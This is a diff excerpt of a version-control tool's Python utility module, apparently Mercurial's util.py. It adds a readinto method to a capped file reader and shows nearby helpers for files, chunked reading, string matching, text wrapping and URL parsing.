2329 2329 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2330 2330 createmode=createmode)
2331 2331 self._fp = posixfile(self._tempname, mode)
2332 2332 self._checkambig = checkambig
2333 2333
2334 2334 # delegated methods
2335 2335 self.read = self._fp.read
2336 2336 self.write = self._fp.write
2337 2337 self.seek = self._fp.seek
2338 2338 self.tell = self._fp.tell
2339 2339 self.fileno = self._fp.fileno
2340 2340
2341 2341 def close(self):
2342 2342 if not self._fp.closed:
2343 2343 self._fp.close()
2344 2344 filename = localpath(self.__name)
2345 2345 oldstat = self._checkambig and filestat.frompath(filename)
2346 2346 if oldstat and oldstat.stat:
2347 2347 rename(self._tempname, filename)
2348 2348 newstat = filestat.frompath(filename)
2349 2349 if newstat.isambig(oldstat):
2350 2350 # stat of changed file is ambiguous to original one
2351 2351 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2352 2352 os.utime(filename, (advanced, advanced))
2353 2353 else:
2354 2354 rename(self._tempname, filename)
2355 2355
2356 2356 def discard(self):
2357 2357 if not self._fp.closed:
2358 2358 try:
2359 2359 os.unlink(self._tempname)
2360 2360 except OSError:
2361 2361 pass
2362 2362 self._fp.close()
2363 2363
2364 2364 def __del__(self):
2365 2365 if safehasattr(self, '_fp'): # constructor actually did something
2366 2366 self.discard()
2367 2367
2368 2368 def __enter__(self):
2369 2369 return self
2370 2370
2371 2371 def __exit__(self, exctype, excvalue, traceback):
2372 2372 if exctype is not None:
2373 2373 self.discard()
2374 2374 else:
2375 2375 self.close()
2376 2376
2377 2377 def unlinkpath(f, ignoremissing=False):
2378 2378 """unlink and remove the directory if it is empty"""
2379 2379 if ignoremissing:
2380 2380 tryunlink(f)
2381 2381 else:
2382 2382 unlink(f)
2383 2383 # try removing directories that might now be empty
2384 2384 try:
2385 2385 removedirs(os.path.dirname(f))
2386 2386 except OSError:
2387 2387 pass
2388 2388
2389 2389 def tryunlink(f):
2390 2390 """Attempt to remove a file, ignoring ENOENT errors."""
2391 2391 try:
2392 2392 unlink(f)
2393 2393 except OSError as e:
2394 2394 if e.errno != errno.ENOENT:
2395 2395 raise
2396 2396
2397 2397 def makedirs(name, mode=None, notindexed=False):
2398 2398 """recursive directory creation with parent mode inheritance
2399 2399
2400 2400 Newly created directories are marked as "not to be indexed by
2401 2401 the content indexing service", if ``notindexed`` is specified
2402 2402 for "write" mode access.
2403 2403 """
2404 2404 try:
2405 2405 makedir(name, notindexed)
2406 2406 except OSError as err:
2407 2407 if err.errno == errno.EEXIST:
2408 2408 return
2409 2409 if err.errno != errno.ENOENT or not name:
2410 2410 raise
2411 2411 parent = os.path.dirname(os.path.abspath(name))
2412 2412 if parent == name:
2413 2413 raise
2414 2414 makedirs(parent, mode, notindexed)
2415 2415 try:
2416 2416 makedir(name, notindexed)
2417 2417 except OSError as err:
2418 2418 # Catch EEXIST to handle races
2419 2419 if err.errno == errno.EEXIST:
2420 2420 return
2421 2421 raise
2422 2422 if mode is not None:
2423 2423 os.chmod(name, mode)
2424 2424
2425 2425 def readfile(path):
2426 2426 with open(path, 'rb') as fp:
2427 2427 return fp.read()
2428 2428
2429 2429 def writefile(path, text):
2430 2430 with open(path, 'wb') as fp:
2431 2431 fp.write(text)
2432 2432
2433 2433 def appendfile(path, text):
2434 2434 with open(path, 'ab') as fp:
2435 2435 fp.write(text)
2436 2436
2437 2437 class chunkbuffer(object):
2438 2438 """Allow arbitrary sized chunks of data to be efficiently read from an
2439 2439 iterator over chunks of arbitrary size."""
2440 2440
2441 2441 def __init__(self, in_iter):
2442 2442 """in_iter is the iterator that's iterating over the input chunks."""
2443 2443 def splitbig(chunks):
2444 2444 for chunk in chunks:
2445 2445 if len(chunk) > 2**20:
2446 2446 pos = 0
2447 2447 while pos < len(chunk):
2448 2448 end = pos + 2 ** 18
2449 2449 yield chunk[pos:end]
2450 2450 pos = end
2451 2451 else:
2452 2452 yield chunk
2453 2453 self.iter = splitbig(in_iter)
2454 2454 self._queue = collections.deque()
2455 2455 self._chunkoffset = 0
2456 2456
2457 2457 def read(self, l=None):
2458 2458 """Read L bytes of data from the iterator of chunks of data.
2459 2459 Returns less than L bytes if the iterator runs dry.
2460 2460
2461 2461 If size parameter is omitted, read everything"""
2462 2462 if l is None:
2463 2463 return ''.join(self.iter)
2464 2464
2465 2465 left = l
2466 2466 buf = []
2467 2467 queue = self._queue
2468 2468 while left > 0:
2469 2469 # refill the queue
2470 2470 if not queue:
2471 2471 target = 2**18
2472 2472 for chunk in self.iter:
2473 2473 queue.append(chunk)
2474 2474 target -= len(chunk)
2475 2475 if target <= 0:
2476 2476 break
2477 2477 if not queue:
2478 2478 break
2479 2479
2480 2480 # The easy way to do this would be to queue.popleft(), modify the
2481 2481 # chunk (if necessary), then queue.appendleft(). However, for cases
2482 2482 # where we read partial chunk content, this incurs 2 dequeue
2483 2483 # mutations and creates a new str for the remaining chunk in the
2484 2484 # queue. Our code below avoids this overhead.
2485 2485
2486 2486 chunk = queue[0]
2487 2487 chunkl = len(chunk)
2488 2488 offset = self._chunkoffset
2489 2489
2490 2490 # Use full chunk.
2491 2491 if offset == 0 and left >= chunkl:
2492 2492 left -= chunkl
2493 2493 queue.popleft()
2494 2494 buf.append(chunk)
2495 2495 # self._chunkoffset remains at 0.
2496 2496 continue
2497 2497
2498 2498 chunkremaining = chunkl - offset
2499 2499
2500 2500 # Use all of unconsumed part of chunk.
2501 2501 if left >= chunkremaining:
2502 2502 left -= chunkremaining
2503 2503 queue.popleft()
2504 2504 # offset == 0 is enabled by block above, so this won't merely
2505 2505 # copy via ``chunk[0:]``.
2506 2506 buf.append(chunk[offset:])
2507 2507 self._chunkoffset = 0
2508 2508
2509 2509 # Partial chunk needed.
2510 2510 else:
2511 2511 buf.append(chunk[offset:offset + left])
2512 2512 self._chunkoffset += left
2513 2513 left -= chunkremaining
2514 2514
2515 2515 return ''.join(buf)
2516 2516
2517 2517 def filechunkiter(f, size=131072, limit=None):
2518 2518 """Create a generator that produces the data in the file size
2519 2519 (default 131072) bytes at a time, up to optional limit (default is
2520 2520 to read all data). Chunks may be less than size bytes if the
2521 2521 chunk is the last chunk in the file, or the file is a socket or
2522 2522 some other type of file that sometimes reads less data than is
2523 2523 requested."""
2524 2524 assert size >= 0
2525 2525 assert limit is None or limit >= 0
2526 2526 while True:
2527 2527 if limit is None:
2528 2528 nbytes = size
2529 2529 else:
2530 2530 nbytes = min(limit, size)
2531 2531 s = nbytes and f.read(nbytes)
2532 2532 if not s:
2533 2533 break
2534 2534 if limit:
2535 2535 limit -= len(s)
2536 2536 yield s
2537 2537
2538 2538 class cappedreader(object):
2539 2539 """A file object proxy that allows reading up to N bytes.
2540 2540
2541 2541 Given a source file object, instances of this type allow reading up to
2542 2542 N bytes from that source file object. Attempts to read past the allowed
2543 2543 limit are treated as EOF.
2544 2544
2545 2545 It is assumed that I/O is not performed on the original file object
2546 2546 in addition to I/O that is performed by this instance. If there is,
2547 2547 state tracking will get out of sync and unexpected results will ensue.
2548 2548 """
2549 2549 def __init__(self, fh, limit):
2550 2550 """Allow reading up to <limit> bytes from <fh>."""
2551 2551 self._fh = fh
2552 2552 self._left = limit
2553 2553
2554 2554 def read(self, n=-1):
2555 2555 if not self._left:
2556 2556 return b''
2557 2557
2558 2558 if n < 0:
2559 2559 n = self._left
2560 2560
2561 2561 data = self._fh.read(min(n, self._left))
2562 2562 self._left -= len(data)
2563 2563 assert self._left >= 0
2564 2564
2565 2565 return data
2566 2566
2567 def readinto(self, b):
2568 res = self.read(len(b))
2569 if res is None:
2570 return None
2571
2572 b[0:len(res)] = res
2573 return len(res)
2574
2567 2575 def stringmatcher(pattern, casesensitive=True):
2568 2576 """
2569 2577 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2570 2578 returns the matcher name, pattern, and matcher function.
2571 2579 missing or unknown prefixes are treated as literal matches.
2572 2580
2573 2581 helper for tests:
2574 2582 >>> def test(pattern, *tests):
2575 2583 ... kind, pattern, matcher = stringmatcher(pattern)
2576 2584 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2577 2585 >>> def itest(pattern, *tests):
2578 2586 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2579 2587 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2580 2588
2581 2589 exact matching (no prefix):
2582 2590 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2583 2591 ('literal', 'abcdefg', [False, False, True])
2584 2592
2585 2593 regex matching ('re:' prefix)
2586 2594 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2587 2595 ('re', 'a.+b', [False, False, True])
2588 2596
2589 2597 force exact matches ('literal:' prefix)
2590 2598 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2591 2599 ('literal', 're:foobar', [False, True])
2592 2600
2593 2601 unknown prefixes are ignored and treated as literals
2594 2602 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2595 2603 ('literal', 'foo:bar', [False, False, True])
2596 2604
2597 2605 case insensitive regex matches
2598 2606 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2599 2607 ('re', 'A.+b', [False, False, True])
2600 2608
2601 2609 case insensitive literal matches
2602 2610 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2603 2611 ('literal', 'ABCDEFG', [False, False, True])
2604 2612 """
2605 2613 if pattern.startswith('re:'):
2606 2614 pattern = pattern[3:]
2607 2615 try:
2608 2616 flags = 0
2609 2617 if not casesensitive:
2610 2618 flags = remod.I
2611 2619 regex = remod.compile(pattern, flags)
2612 2620 except remod.error as e:
2613 2621 raise error.ParseError(_('invalid regular expression: %s')
2614 2622 % e)
2615 2623 return 're', pattern, regex.search
2616 2624 elif pattern.startswith('literal:'):
2617 2625 pattern = pattern[8:]
2618 2626
2619 2627 match = pattern.__eq__
2620 2628
2621 2629 if not casesensitive:
2622 2630 ipat = encoding.lower(pattern)
2623 2631 match = lambda s: ipat == encoding.lower(s)
2624 2632 return 'literal', pattern, match
2625 2633
2626 2634 def shortuser(user):
2627 2635 """Return a short representation of a user name or email address."""
2628 2636 f = user.find('@')
2629 2637 if f >= 0:
2630 2638 user = user[:f]
2631 2639 f = user.find('<')
2632 2640 if f >= 0:
2633 2641 user = user[f + 1:]
2634 2642 f = user.find(' ')
2635 2643 if f >= 0:
2636 2644 user = user[:f]
2637 2645 f = user.find('.')
2638 2646 if f >= 0:
2639 2647 user = user[:f]
2640 2648 return user
2641 2649
2642 2650 def emailuser(user):
2643 2651 """Return the user portion of an email address."""
2644 2652 f = user.find('@')
2645 2653 if f >= 0:
2646 2654 user = user[:f]
2647 2655 f = user.find('<')
2648 2656 if f >= 0:
2649 2657 user = user[f + 1:]
2650 2658 return user
2651 2659
2652 2660 def email(author):
2653 2661 '''get email of author.'''
2654 2662 r = author.find('>')
2655 2663 if r == -1:
2656 2664 r = None
2657 2665 return author[author.find('<') + 1:r]
2658 2666
2659 2667 def ellipsis(text, maxlength=400):
2660 2668 """Trim string to at most maxlength (default: 400) columns in display."""
2661 2669 return encoding.trim(text, maxlength, ellipsis='...')
2662 2670
2663 2671 def unitcountfn(*unittable):
2664 2672 '''return a function that renders a readable count of some quantity'''
2665 2673
2666 2674 def go(count):
2667 2675 for multiplier, divisor, format in unittable:
2668 2676 if abs(count) >= divisor * multiplier:
2669 2677 return format % (count / float(divisor))
2670 2678 return unittable[-1][2] % count
2671 2679
2672 2680 return go
2673 2681
2674 2682 def processlinerange(fromline, toline):
2675 2683 """Check that linerange <fromline>:<toline> makes sense and return a
2676 2684 0-based range.
2677 2685
2678 2686 >>> processlinerange(10, 20)
2679 2687 (9, 20)
2680 2688 >>> processlinerange(2, 1)
2681 2689 Traceback (most recent call last):
2682 2690 ...
2683 2691 ParseError: line range must be positive
2684 2692 >>> processlinerange(0, 5)
2685 2693 Traceback (most recent call last):
2686 2694 ...
2687 2695 ParseError: fromline must be strictly positive
2688 2696 """
2689 2697 if toline - fromline < 0:
2690 2698 raise error.ParseError(_("line range must be positive"))
2691 2699 if fromline < 1:
2692 2700 raise error.ParseError(_("fromline must be strictly positive"))
2693 2701 return fromline - 1, toline
2694 2702
2695 2703 bytecount = unitcountfn(
2696 2704 (100, 1 << 30, _('%.0f GB')),
2697 2705 (10, 1 << 30, _('%.1f GB')),
2698 2706 (1, 1 << 30, _('%.2f GB')),
2699 2707 (100, 1 << 20, _('%.0f MB')),
2700 2708 (10, 1 << 20, _('%.1f MB')),
2701 2709 (1, 1 << 20, _('%.2f MB')),
2702 2710 (100, 1 << 10, _('%.0f KB')),
2703 2711 (10, 1 << 10, _('%.1f KB')),
2704 2712 (1, 1 << 10, _('%.2f KB')),
2705 2713 (1, 1, _('%.0f bytes')),
2706 2714 )
2707 2715
2708 2716 class transformingwriter(object):
2709 2717 """Writable file wrapper to transform data by function"""
2710 2718
2711 2719 def __init__(self, fp, encode):
2712 2720 self._fp = fp
2713 2721 self._encode = encode
2714 2722
2715 2723 def close(self):
2716 2724 self._fp.close()
2717 2725
2718 2726 def flush(self):
2719 2727 self._fp.flush()
2720 2728
2721 2729 def write(self, data):
2722 2730 return self._fp.write(self._encode(data))
2723 2731
2724 2732 # Matches a single EOL which can either be a CRLF where repeated CR
2725 2733 # are removed or a LF. We do not care about old Macintosh files, so a
2726 2734 # stray CR is an error.
2727 2735 _eolre = remod.compile(br'\r*\n')
2728 2736
2729 2737 def tolf(s):
2730 2738 return _eolre.sub('\n', s)
2731 2739
2732 2740 def tocrlf(s):
2733 2741 return _eolre.sub('\r\n', s)
2734 2742
2735 2743 def _crlfwriter(fp):
2736 2744 return transformingwriter(fp, tocrlf)
2737 2745
2738 2746 if pycompat.oslinesep == '\r\n':
2739 2747 tonativeeol = tocrlf
2740 2748 fromnativeeol = tolf
2741 2749 nativeeolwriter = _crlfwriter
2742 2750 else:
2743 2751 tonativeeol = pycompat.identity
2744 2752 fromnativeeol = pycompat.identity
2745 2753 nativeeolwriter = pycompat.identity
2746 2754
2747 2755 def escapestr(s):
2748 2756 # call underlying function of s.encode('string_escape') directly for
2749 2757 # Python 3 compatibility
2750 2758 return codecs.escape_encode(s)[0]
2751 2759
2752 2760 def unescapestr(s):
2753 2761 return codecs.escape_decode(s)[0]
2754 2762
2755 2763 def forcebytestr(obj):
2756 2764 """Portably format an arbitrary object (e.g. exception) into a byte
2757 2765 string."""
2758 2766 try:
2759 2767 return pycompat.bytestr(obj)
2760 2768 except UnicodeEncodeError:
2761 2769 # non-ascii string, may be lossy
2762 2770 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2763 2771
2764 2772 def uirepr(s):
2765 2773 # Avoid double backslash in Windows path repr()
2766 2774 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2767 2775
2768 2776 # delay import of textwrap
2769 2777 def MBTextWrapper(**kwargs):
2770 2778 class tw(textwrap.TextWrapper):
2771 2779 """
2772 2780 Extend TextWrapper for width-awareness.
2773 2781
2774 2782 Neither number of 'bytes' in any encoding nor 'characters' is
2775 2783 appropriate to calculate terminal columns for specified string.
2776 2784
2777 2785 Original TextWrapper implementation uses built-in 'len()' directly,
2778 2786 so overriding is needed to use width information of each characters.
2779 2787
2780 2788 In addition, characters classified into 'ambiguous' width are
2781 2789 treated as wide in East Asian area, but as narrow in other.
2782 2790
2783 2791 This requires use decision to determine width of such characters.
2784 2792 """
2785 2793 def _cutdown(self, ucstr, space_left):
2786 2794 l = 0
2787 2795 colwidth = encoding.ucolwidth
2788 2796 for i in xrange(len(ucstr)):
2789 2797 l += colwidth(ucstr[i])
2790 2798 if space_left < l:
2791 2799 return (ucstr[:i], ucstr[i:])
2792 2800 return ucstr, ''
2793 2801
2794 2802 # overriding of base class
2795 2803 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2796 2804 space_left = max(width - cur_len, 1)
2797 2805
2798 2806 if self.break_long_words:
2799 2807 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2800 2808 cur_line.append(cut)
2801 2809 reversed_chunks[-1] = res
2802 2810 elif not cur_line:
2803 2811 cur_line.append(reversed_chunks.pop())
2804 2812
2805 2813 # this overriding code is imported from TextWrapper of Python 2.6
2806 2814 # to calculate columns of string by 'encoding.ucolwidth()'
2807 2815 def _wrap_chunks(self, chunks):
2808 2816 colwidth = encoding.ucolwidth
2809 2817
2810 2818 lines = []
2811 2819 if self.width <= 0:
2812 2820 raise ValueError("invalid width %r (must be > 0)" % self.width)
2813 2821
2814 2822 # Arrange in reverse order so items can be efficiently popped
2815 2823 # from a stack of chucks.
2816 2824 chunks.reverse()
2817 2825
2818 2826 while chunks:
2819 2827
2820 2828 # Start the list of chunks that will make up the current line.
2821 2829 # cur_len is just the length of all the chunks in cur_line.
2822 2830 cur_line = []
2823 2831 cur_len = 0
2824 2832
2825 2833 # Figure out which static string will prefix this line.
2826 2834 if lines:
2827 2835 indent = self.subsequent_indent
2828 2836 else:
2829 2837 indent = self.initial_indent
2830 2838
2831 2839 # Maximum width for this line.
2832 2840 width = self.width - len(indent)
2833 2841
2834 2842 # First chunk on line is whitespace -- drop it, unless this
2835 2843 # is the very beginning of the text (i.e. no lines started yet).
2836 2844 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2837 2845 del chunks[-1]
2838 2846
2839 2847 while chunks:
2840 2848 l = colwidth(chunks[-1])
2841 2849
2842 2850 # Can at least squeeze this chunk onto the current line.
2843 2851 if cur_len + l <= width:
2844 2852 cur_line.append(chunks.pop())
2845 2853 cur_len += l
2846 2854
2847 2855 # Nope, this line is full.
2848 2856 else:
2849 2857 break
2850 2858
2851 2859 # The current line is full, and the next chunk is too big to
2852 2860 # fit on *any* line (not just this one).
2853 2861 if chunks and colwidth(chunks[-1]) > width:
2854 2862 self._handle_long_word(chunks, cur_line, cur_len, width)
2855 2863
2856 2864 # If the last chunk on this line is all whitespace, drop it.
2857 2865 if (self.drop_whitespace and
2858 2866 cur_line and cur_line[-1].strip() == r''):
2859 2867 del cur_line[-1]
2860 2868
2861 2869 # Convert current line back to a string and store it in list
2862 2870 # of all lines (return value).
2863 2871 if cur_line:
2864 2872 lines.append(indent + r''.join(cur_line))
2865 2873
2866 2874 return lines
2867 2875
2868 2876 global MBTextWrapper
2869 2877 MBTextWrapper = tw
2870 2878 return tw(**kwargs)
2871 2879
2872 2880 def wrap(line, width, initindent='', hangindent=''):
2873 2881 maxindent = max(len(hangindent), len(initindent))
2874 2882 if width <= maxindent:
2875 2883 # adjust for weird terminal size
2876 2884 width = max(78, maxindent + 1)
2877 2885 line = line.decode(pycompat.sysstr(encoding.encoding),
2878 2886 pycompat.sysstr(encoding.encodingmode))
2879 2887 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2880 2888 pycompat.sysstr(encoding.encodingmode))
2881 2889 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2882 2890 pycompat.sysstr(encoding.encodingmode))
2883 2891 wrapper = MBTextWrapper(width=width,
2884 2892 initial_indent=initindent,
2885 2893 subsequent_indent=hangindent)
2886 2894 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2887 2895
2888 2896 if (pyplatform.python_implementation() == 'CPython' and
2889 2897 sys.version_info < (3, 0)):
2890 2898 # There is an issue in CPython that some IO methods do not handle EINTR
2891 2899 # correctly. The following table shows what CPython version (and functions)
2892 2900 # are affected (buggy: has the EINTR bug, okay: otherwise):
2893 2901 #
2894 2902 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2895 2903 # --------------------------------------------------
2896 2904 # fp.__iter__ | buggy | buggy | okay
2897 2905 # fp.read* | buggy | okay [1] | okay
2898 2906 #
2899 2907 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2900 2908 #
2901 2909 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2902 2910 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2903 2911 #
2904 2912 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2905 2913 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2906 2914 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2907 2915 # fp.__iter__ but not other fp.read* methods.
2908 2916 #
2909 2917 # On modern systems like Linux, the "read" syscall cannot be interrupted
2910 2918 # when reading "fast" files like on-disk files. So the EINTR issue only
2911 2919 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2912 2920 # files approximately as "fast" files and use the fast (unsafe) code path,
2913 2921 # to minimize the performance impact.
2914 2922 if sys.version_info >= (2, 7, 4):
2915 2923 # fp.readline deals with EINTR correctly, use it as a workaround.
2916 2924 def _safeiterfile(fp):
2917 2925 return iter(fp.readline, '')
2918 2926 else:
2919 2927 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2920 2928 # note: this may block longer than necessary because of bufsize.
2921 2929 def _safeiterfile(fp, bufsize=4096):
2922 2930 fd = fp.fileno()
2923 2931 line = ''
2924 2932 while True:
2925 2933 try:
2926 2934 buf = os.read(fd, bufsize)
2927 2935 except OSError as ex:
2928 2936 # os.read only raises EINTR before any data is read
2929 2937 if ex.errno == errno.EINTR:
2930 2938 continue
2931 2939 else:
2932 2940 raise
2933 2941 line += buf
2934 2942 if '\n' in buf:
2935 2943 splitted = line.splitlines(True)
2936 2944 line = ''
2937 2945 for l in splitted:
2938 2946 if l[-1] == '\n':
2939 2947 yield l
2940 2948 else:
2941 2949 line = l
2942 2950 if not buf:
2943 2951 break
2944 2952 if line:
2945 2953 yield line
2946 2954
2947 2955 def iterfile(fp):
2948 2956 fastpath = True
2949 2957 if type(fp) is file:
2950 2958 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2951 2959 if fastpath:
2952 2960 return fp
2953 2961 else:
2954 2962 return _safeiterfile(fp)
2955 2963 else:
2956 2964 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2957 2965 def iterfile(fp):
2958 2966 return fp
2959 2967
2960 2968 def iterlines(iterator):
2961 2969 for chunk in iterator:
2962 2970 for line in chunk.splitlines():
2963 2971 yield line
2964 2972
2965 2973 def expandpath(path):
2966 2974 return os.path.expanduser(os.path.expandvars(path))
2967 2975
2968 2976 def hgcmd():
2969 2977 """Return the command used to execute current hg
2970 2978
2971 2979 This is different from hgexecutable() because on Windows we want
2972 2980 to avoid things opening new shell windows like batch files, so we
2973 2981 get either the python call or current executable.
2974 2982 """
2975 2983 if mainfrozen():
2976 2984 if getattr(sys, 'frozen', None) == 'macosx_app':
2977 2985 # Env variable set by py2app
2978 2986 return [encoding.environ['EXECUTABLEPATH']]
2979 2987 else:
2980 2988 return [pycompat.sysexecutable]
2981 2989 return gethgcmd()
2982 2990
2983 2991 def rundetached(args, condfn):
2984 2992 """Execute the argument list in a detached process.
2985 2993
2986 2994 condfn is a callable which is called repeatedly and should return
2987 2995 True once the child process is known to have started successfully.
2988 2996 At this point, the child process PID is returned. If the child
2989 2997 process fails to start or finishes before condfn() evaluates to
2990 2998 True, return -1.
2991 2999 """
2992 3000 # Windows case is easier because the child process is either
2993 3001 # successfully starting and validating the condition or exiting
2994 3002 # on failure. We just poll on its PID. On Unix, if the child
2995 3003 # process fails to start, it will be left in a zombie state until
2996 3004 # the parent wait on it, which we cannot do since we expect a long
2997 3005 # running process on success. Instead we listen for SIGCHLD telling
2998 3006 # us our child process terminated.
2999 3007 terminated = set()
3000 3008 def handler(signum, frame):
3001 3009 terminated.add(os.wait())
3002 3010 prevhandler = None
3003 3011 SIGCHLD = getattr(signal, 'SIGCHLD', None)
3004 3012 if SIGCHLD is not None:
3005 3013 prevhandler = signal.signal(SIGCHLD, handler)
3006 3014 try:
3007 3015 pid = spawndetached(args)
3008 3016 while not condfn():
3009 3017 if ((pid in terminated or not testpid(pid))
3010 3018 and not condfn()):
3011 3019 return -1
3012 3020 time.sleep(0.1)
3013 3021 return pid
3014 3022 finally:
3015 3023 if prevhandler is not None:
3016 3024 signal.signal(signal.SIGCHLD, prevhandler)
3017 3025
3018 3026 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3019 3027 """Return the result of interpolating items in the mapping into string s.
3020 3028
3021 3029 prefix is a single character string, or a two character string with
3022 3030 a backslash as the first character if the prefix needs to be escaped in
3023 3031 a regular expression.
3024 3032
3025 3033 fn is an optional function that will be applied to the replacement text
3026 3034 just before replacement.
3027 3035
3028 3036 escape_prefix is an optional flag that allows using doubled prefix for
3029 3037 its escaping.
3030 3038 """
3031 3039 fn = fn or (lambda s: s)
3032 3040 patterns = '|'.join(mapping.keys())
3033 3041 if escape_prefix:
3034 3042 patterns += '|' + prefix
3035 3043 if len(prefix) > 1:
3036 3044 prefix_char = prefix[1:]
3037 3045 else:
3038 3046 prefix_char = prefix
3039 3047 mapping[prefix_char] = prefix_char
3040 3048 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3041 3049 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3042 3050
3043 3051 def getport(port):
3044 3052 """Return the port for a given network service.
3045 3053
3046 3054 If port is an integer, it's returned as is. If it's a string, it's
3047 3055 looked up using socket.getservbyname(). If there's no matching
3048 3056 service, error.Abort is raised.
3049 3057 """
3050 3058 try:
3051 3059 return int(port)
3052 3060 except ValueError:
3053 3061 pass
3054 3062
3055 3063 try:
3056 3064 return socket.getservbyname(pycompat.sysstr(port))
3057 3065 except socket.error:
3058 3066 raise Abort(_("no port number associated with service '%s'") % port)
3059 3067
3060 3068 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3061 3069 '0': False, 'no': False, 'false': False, 'off': False,
3062 3070 'never': False}
3063 3071
3064 3072 def parsebool(s):
3065 3073 """Parse s into a boolean.
3066 3074
3067 3075 If s is not a valid boolean, returns None.
3068 3076 """
3069 3077 return _booleans.get(s.lower(), None)
3070 3078
3071 3079 _hextochr = dict((a + b, chr(int(a + b, 16)))
3072 3080 for a in string.hexdigits for b in string.hexdigits)
3073 3081
3074 3082 class url(object):
3075 3083 r"""Reliable URL parser.
3076 3084
3077 3085 This parses URLs and provides attributes for the following
3078 3086 components:
3079 3087
3080 3088 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3081 3089
3082 3090 Missing components are set to None. The only exception is
3083 3091 fragment, which is set to '' if present but empty.
3084 3092
3085 3093 If parsefragment is False, fragment is included in query. If
3086 3094 parsequery is False, query is included in path. If both are
3087 3095 False, both fragment and query are included in path.
3088 3096
3089 3097 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3090 3098
3091 3099 Note that for backward compatibility reasons, bundle URLs do not
3092 3100 take host names. That means 'bundle://../' has a path of '../'.
3093 3101
3094 3102 Examples:
3095 3103
3096 3104 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3097 3105 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3098 3106 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3099 3107 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3100 3108 >>> url(b'file:///home/joe/repo')
3101 3109 <url scheme: 'file', path: '/home/joe/repo'>
3102 3110 >>> url(b'file:///c:/temp/foo/')
3103 3111 <url scheme: 'file', path: 'c:/temp/foo/'>
3104 3112 >>> url(b'bundle:foo')
3105 3113 <url scheme: 'bundle', path: 'foo'>
3106 3114 >>> url(b'bundle://../foo')
3107 3115 <url scheme: 'bundle', path: '../foo'>
3108 3116 >>> url(br'c:\foo\bar')
3109 3117 <url path: 'c:\\foo\\bar'>
3110 3118 >>> url(br'\\blah\blah\blah')
3111 3119 <url path: '\\\\blah\\blah\\blah'>
3112 3120 >>> url(br'\\blah\blah\blah#baz')
3113 3121 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3114 3122 >>> url(br'file:///C:\users\me')
3115 3123 <url scheme: 'file', path: 'C:\\users\\me'>
3116 3124
3117 3125 Authentication credentials:
3118 3126
3119 3127 >>> url(b'ssh://joe:xyz@x/repo')
3120 3128 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3121 3129 >>> url(b'ssh://joe@x/repo')
3122 3130 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3123 3131
3124 3132 Query strings and fragments:
3125 3133
3126 3134 >>> url(b'http://host/a?b#c')
3127 3135 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3128 3136 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3129 3137 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3130 3138
3131 3139 Empty path:
3132 3140
3133 3141 >>> url(b'')
3134 3142 <url path: ''>
3135 3143 >>> url(b'#a')
3136 3144 <url path: '', fragment: 'a'>
3137 3145 >>> url(b'http://host/')
3138 3146 <url scheme: 'http', host: 'host', path: ''>
3139 3147 >>> url(b'http://host/#a')
3140 3148 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3141 3149
3142 3150 Only scheme:
3143 3151
3144 3152 >>> url(b'http:')
3145 3153 <url scheme: 'http'>
3146 3154 """
3147 3155
3148 3156 _safechars = "!~*'()+"
3149 3157 _safepchars = "/!~*'()+:\\"
3150 3158 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3151 3159
3152 3160 def __init__(self, path, parsequery=True, parsefragment=True):
3153 3161 # We slowly chomp away at path until we have only the path left
3154 3162 self.scheme = self.user = self.passwd = self.host = None
3155 3163 self.port = self.path = self.query = self.fragment = None
3156 3164 self._localpath = True
3157 3165 self._hostport = ''
3158 3166 self._origpath = path
3159 3167
3160 3168 if parsefragment and '#' in path:
3161 3169 path, self.fragment = path.split('#', 1)
3162 3170
